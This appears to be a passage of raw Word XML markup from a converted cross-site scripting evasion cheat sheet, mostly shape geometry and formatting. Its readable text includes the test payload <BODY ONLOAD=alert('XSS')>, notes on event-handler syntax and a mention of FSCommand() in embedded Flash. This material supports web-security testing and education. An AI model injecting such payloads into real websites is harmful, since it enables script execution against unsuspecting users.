                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>52070</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="471170" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1186" name="Freeform 1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1170" cy="116205"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="+- 0 8118 7398"/>
                            <a:gd name="T1" fmla="*/ T0 w 742"/>
                            <a:gd name="T2" fmla="+- 0 264 82"/>
                            <a:gd name="T3" fmla="*/ 264 h 183"/>
                            <a:gd name="T4" fmla="+- 0 7419 7398"/>
                            <a:gd name="T5" fmla="*/ T4 w 742"/>
                            <a:gd name="T6" fmla="+- 0 264 82"/>
                            <a:gd name="T7" fmla="*/ 264 h 183"/>
                            <a:gd name="T8" fmla="+- 0 7416 7398"/>
                            <a:gd name="T9" fmla="*/ T8 w 742"/>
                            <a:gd name="T10" fmla="+- 0 264 82"/>
                            <a:gd name="T11" fmla="*/ 264 h 183"/>
                            <a:gd name="T12" fmla="+- 0 7398 7398"/>
                            <a:gd name="T13" fmla="*/ T12 w 742"/>
                            <a:gd name="T14" fmla="+- 0 243 82"/>
                            <a:gd name="T15" fmla="*/ 243 h 183"/>
                            <a:gd name="T16" fmla="+- 0 7398 7398"/>
                            <a:gd name="T17" fmla="*/ T16 w 742"/>
                            <a:gd name="T18" fmla="+- 0 240 82"/>
                            <a:gd name="T19" fmla="*/ 240 h 183"/>
                            <a:gd name="T20" fmla="+- 0 7398 7398"/>
                            <a:gd name="T21" fmla="*/ T20 w 742"/>
                            <a:gd name="T22" fmla="+- 0 103 82"/>
                            <a:gd name="T23" fmla="*/ 103 h 183"/>
                            <a:gd name="T24" fmla="+- 0 7419 7398"/>
                            <a:gd name="T25" fmla="*/ T24 w 742"/>
                            <a:gd name="T26" fmla="+- 0 82 82"/>
                            <a:gd name="T27" fmla="*/ 82 h 183"/>
                            <a:gd name="T28" fmla="+- 0 8118 7398"/>
                            <a:gd name="T29" fmla="*/ T28 w 742"/>
                            <a:gd name="T30" fmla="+- 0 82 82"/>
                            <a:gd name="T31" fmla="*/ 82 h 183"/>
                            <a:gd name="T32" fmla="+- 0 8139 7398"/>
                            <a:gd name="T33" fmla="*/ T32 w 742"/>
                            <a:gd name="T34" fmla="+- 0 103 82"/>
                            <a:gd name="T35" fmla="*/ 103 h 183"/>
                            <a:gd name="T36" fmla="+- 0 8139 7398"/>
                            <a:gd name="T37" fmla="*/ T36 w 742"/>
                            <a:gd name="T38" fmla="+- 0 243 82"/>
                            <a:gd name="T39" fmla="*/ 243 h 183"/>
                            <a:gd name="T40" fmla="+- 0 8121 7398"/>
                            <a:gd name="T41" fmla="*/ T40 w 742"/>
                            <a:gd name="T42" fmla="+- 0 264 82"/>
                            <a:gd name="T43" fmla="*/ 264 h 183"/>
                            <a:gd name="T44" fmla="+- 0 8118 7398"/>
                            <a:gd name="T45" fmla="*/ T44 w 742"/>
                            <a:gd name="T46" fmla="+- 0 264 82"/>
                            <a:gd name="T47" fmla="*/ 264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742" h="183">
                              <a:moveTo>
                                <a:pt x="720" y="182"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="21" y="182"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="18" y="182"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="161"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="15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720" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="741" y="21"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="741" y="161"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="723" y="182"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="720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B374B" id="Freeform 1187" o:spid="_x0000_s1026" style="position:absolute;margin-left:369.9pt;margin-top:4.1pt;width:37.1pt;height:9.15pt;z-index:-1764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" path="m720,182r-699,l18,182,,161r,-3l,21,21,,720,r21,21l741,161r-18,21l720,182xe" fillcolor="#f5f5f5" stroked="f">
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="457200,167640;13335,167640;11430,167640;0,154305;0,152400;0,65405;13335,52070;457200,52070;470535,65405;470535,154305;459105,167640;457200,167640" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                <w10:wrap anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>additionally</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>noted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before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equals</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>sign</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console"/>
          <w:color w:val="36454E"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>onload=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console"/>
          <w:color w:val="36454E"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>!=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="37"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console"/>
          <w:color w:val="36454E"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>onload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console"/>
          <w:color w:val="36454E"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console"/>
          <w:color w:val="36454E"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console"/>
          <w:color w:val="36454E"/>
          <w:spacing w:val="-55"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="8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151765</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1435100" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="1183" name="Group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5100" cy="116205"/>
                          <a:chOff x="1614" y="239"/>
                          <a:chExt cx="2260" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1184" name="Freeform 1186"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="239"/>
                            <a:ext cx="2260" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3853 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 2260"/>
                              <a:gd name="T2" fmla="+- 0 422 239"/>
                              <a:gd name="T3" fmla="*/ 422 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 2260"/>
                              <a:gd name="T6" fmla="+- 0 422 239"/>
                              <a:gd name="T7" fmla="*/ 422 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 2260"/>
                              <a:gd name="T10" fmla="+- 0 421 239"/>
                              <a:gd name="T11" fmla="*/ 421 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 2260"/>
                              <a:gd name="T14" fmla="+- 0 401 239"/>
                              <a:gd name="T15" fmla="*/ 401 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 2260"/>
                              <a:gd name="T18" fmla="+- 0 397 239"/>
                              <a:gd name="T19" fmla="*/ 397 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 2260"/>
                              <a:gd name="T22" fmla="+- 0 260 239"/>
                              <a:gd name="T23" fmla="*/ 260 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 2260"/>
                              <a:gd name="T26" fmla="+- 0 239 239"/>
                              <a:gd name="T27" fmla="*/ 239 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3853 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 2260"/>
                              <a:gd name="T30" fmla="+- 0 239 239"/>
                              <a:gd name="T31" fmla="*/ 239 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3874 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 2260"/>
                              <a:gd name="T34" fmla="+- 0 260 239"/>
                              <a:gd name="T35" fmla="*/ 260 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3874 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 2260"/>
                              <a:gd name="T38" fmla="+- 0 401 239"/>
                              <a:gd name="T39" fmla="*/ 401 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3856 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 2260"/>
                              <a:gd name="T42" fmla="+- 0 421 239"/>
                              <a:gd name="T43" fmla="*/ 421 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3853 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 2260"/>
                              <a:gd name="T46" fmla="+- 0 422 239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60" h="183">
                                <a:moveTo>
                                  <a:pt x="2239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239" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2260" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2260" y="162"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2242" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="223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" name="Text Box 1185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39"/>
                            <a:ext cx="226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&lt;BODY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4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ONLOAD=alert('XSS')&gt;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4" o:spid="_x0000_s1248" style="position:absolute;margin-left:80.7pt;margin-top:11.95pt;width:113pt;height:9.15pt;z-index:-15689728;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,239" coordsize="226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">
                <v:shape id="Freeform 1186" o:spid="_x0000_s1249" style="position:absolute;left:1614;top:239;width:2260;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="226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Oj2MQA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTYvCMBC9C/6HMMLe1lQRt1SjiCK4Bw+6e9Db0Ixt&#10;tZnUJmrrrzcLC97m8T5nOm9MKe5Uu8KygkE/AkGcWl1wpuD3Z/0Zg3AeWWNpmRS05GA+63ammGj7&#10;4B3d9z4TIYRdggpy76tESpfmZND1bUUcuJOtDfoA60zqGh8h3JRyGEVjabDg0JBjRcuc0sv+ZhR8&#10;f2WtP99W18Nwdzy2S3tuzfap1EevWUxAeGr8W/zv3ugwfxCP4O+bcIK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To9jEAAAA3QAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m2239,183l21,183r-3,-1l,162r,-4l,21,21,,2239,r21,21l2260,162r-18,20l2239,183xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="2239,422;21,422;18,421;0,401;0,397;0,260;21,239;2239,239;2260,260;2260,401;2242,421;2239,422" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1185" o:spid="_x0000_s1250" type="#_x0000_t202" style="position:absolute;left:1614;top:239;width:226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3O58QA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9F/oflin01mwsKJq6EZEKQqE0xoPHaXZM&#10;lmRnY3bV9N93CwVv83ifs1yNthNXGrxxrGCSpCCIK6cN1woO5fZlDsIHZI2dY1LwQx5W+ePDEjPt&#10;blzQdR9qEUPYZ6igCaHPpPRVQxZ94nriyJ3cYDFEONRSD3iL4baTr2k6kxYNx4YGe9o0VLX7i1Ww&#10;PnLxbs6f31/FqTBluUj5Y9Yq9fw0rt9ABBrDXfzv3uk4fzKfwt838QS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dzuf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&lt;BODY</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="54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ONLOAD=alert('XSS')&gt;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Event</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Handlers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3" w:lineRule="auto"/>
        <w:ind w:left="154" w:right="347"/>
      </w:pP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similar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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attacks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t>(this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comprehensive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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net,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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writing).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Thanks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Rene</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Ledosquet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HTML+TIME</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>updates.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="159"/>
        <w:ind w:left="154"/>
      </w:pPr>
      <w:r>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId24">
        <w:r>
          <w:rPr>
            <w:color w:val="4050B4"/>
          </w:rPr>
          <w:t>Dottoro</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="4050B4"/>
            <w:spacing w:val="7"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="4050B4"/>
          </w:rPr>
          <w:t>Web</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="4050B4"/>
            <w:spacing w:val="7"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="4050B4"/>
          </w:rPr>
          <w:t>Reference</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="4050B4"/>
            <w:spacing w:val="7"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>also</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8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nice</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId25">
        <w:r>
          <w:rPr>
            <w:color w:val="4050B4"/>
          </w:rPr>
          <w:t>list</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="4050B4"/>
            <w:spacing w:val="7"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="4050B4"/>
          </w:rPr>
          <w:t>of</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="4050B4"/>
            <w:spacing w:val="8"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="4050B4"/>
          </w:rPr>
          <w:t>events</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="4050B4"/>
            <w:spacing w:val="7"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="4050B4"/>
          </w:rPr>
          <w:t>in</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="4050B4"/>
            <w:spacing w:val="7"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="4050B4"/>
          </w:rPr>
          <w:t>JavaScript</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:rPr>
          <w:sz w:val="12"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1504"/>
          <w:tab w:val="left" w:pos="1506"/>
        </w:tabs>
        <w:spacing w:before="101"/>
        <w:ind w:hanging="1218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6784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67945</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="633095" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1180" name="Group 1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107"/>
                          <a:chExt cx="997" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1181" name="Freeform 1183"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="107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289 107"/>
                              <a:gd name="T3" fmla="*/ 289 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 997"/>
                              <a:gd name="T6" fmla="+- 0 289 107"/>
                              <a:gd name="T7" fmla="*/ 289 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 997"/>
                              <a:gd name="T10" fmla="+- 0 289 107"/>
                              <a:gd name="T11" fmla="*/ 289 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 997"/>
                              <a:gd name="T14" fmla="+- 0 268 107"/>
                              <a:gd name="T15" fmla="*/ 268 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 997"/>
                              <a:gd name="T18" fmla="+- 0 265 107"/>
                              <a:gd name="T19" fmla="*/ 265 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 997"/>
                              <a:gd name="T22" fmla="+- 0 128 107"/>
                              <a:gd name="T23" fmla="*/ 128 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 997"/>
                              <a:gd name="T26" fmla="+- 0 107 107"/>
                              <a:gd name="T27" fmla="*/ 107 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2906 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 997"/>
                              <a:gd name="T30" fmla="+- 0 107 107"/>
                              <a:gd name="T31" fmla="*/ 107 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2927 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 997"/>
                              <a:gd name="T34" fmla="+- 0 128 107"/>
                              <a:gd name="T35" fmla="*/ 128 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2927 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 997"/>
                              <a:gd name="T38" fmla="+- 0 268 107"/>
                              <a:gd name="T39" fmla="*/ 268 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2909 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 997"/>
                              <a:gd name="T42" fmla="+- 0 289 107"/>
                              <a:gd name="T43" fmla="*/ 289 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2906 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 997"/>
                              <a:gd name="T46" fmla="+- 0 289 107"/>
                              <a:gd name="T47" fmla="*/ 2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" name="Text Box 118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07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FSCommand()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1" o:spid="_x0000_s1251" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:5.35pt;width:49.85pt;height:9.15pt;z-index:-17648640;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,107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">
                <v:shape id="Freeform 1183" o:spid="_x0000_s1252" style="position:absolute;left:1930;top:107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OTgsMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPS4vCMBC+C/6HMIIX0bQuLFqNIoqwh3XB131sxrbY&#10;TGqTavffm4UFb/PxPWe+bE0pHlS7wrKCeBSBIE6tLjhTcDpuhxMQziNrLC2Tgl9ysFx0O3NMtH3y&#10;nh4Hn4kQwi5BBbn3VSKlS3My6Ea2Ig7c1dYGfYB1JnWNzxBuSjmOok9psODQkGNF65zS26ExCnb3&#10;qdxsyttq8PN9bVxzOV8+dKxUv9euZiA8tf4t/nd/6TA/nsTw9004QS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OTgsMAAADdAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m976,182r-955,l18,182,,161r,-3l,21,21,,976,r21,21l997,161r-18,21l976,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="976,289;21,289;18,289;0,268;0,265;0,128;21,107;976,107;997,128;997,268;979,289;976,289" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1182" o:spid="_x0000_s1253" type="#_x0000_t202" style="position:absolute;left:1930;top:107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Wk8IA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTYvCMBC9C/sfwgjeNNWDaDWKyC4sCGKtB49jM7bB&#10;ZtJtslr/vVlY8DaP9znLdWdrcafWG8cKxqMEBHHhtOFSwSn/Gs5A+ICssXZMCp7kYb366C0x1e7B&#10;Gd2PoRQxhH2KCqoQmlRKX1Rk0Y9cQxy5q2sthgjbUuoWHzHc1nKSJFNp0XBsqLChbUXF7fhrFWzO&#10;nH2an/3lkF0zk+fzhHfTm1KDfrdZgAjUhbf43/2t4/zxbAJ/38QT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NFaTwgAAAN0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FSCommand()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(attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>when</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>executed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>within</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>an</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>embedded</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Flash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>object)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336"/>
          <w:tab w:val="left" w:pos="1337"/>
        </w:tabs>
        <w:spacing w:before="149"/>
        <w:ind w:left="1336" w:hanging="1049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6835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98425</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="525145" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1177" name="Group 1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155"/>
                          <a:chExt cx="827" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1178" name="Freeform 1180"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="155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337 155"/>
                              <a:gd name="T3" fmla="*/ 337 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 827"/>
                              <a:gd name="T6" fmla="+- 0 337 155"/>
                              <a:gd name="T7" fmla="*/ 337 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 827"/>
                              <a:gd name="T10" fmla="+- 0 337 155"/>
                              <a:gd name="T11" fmla="*/ 337 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 827"/>
                              <a:gd name="T14" fmla="+- 0 316 155"/>
                              <a:gd name="T15" fmla="*/ 316 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 827"/>
                              <a:gd name="T18" fmla="+- 0 313 155"/>
                              <a:gd name="T19" fmla="*/ 313 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 827"/>
                              <a:gd name="T22" fmla="+- 0 176 155"/>
                              <a:gd name="T23" fmla="*/ 176 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 827"/>
                              <a:gd name="T26" fmla="+- 0 155 155"/>
                              <a:gd name="T27" fmla="*/ 155 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2735 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 827"/>
                              <a:gd name="T30" fmla="+- 0 155 155"/>
                              <a:gd name="T31" fmla="*/ 155 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2756 1930"/>
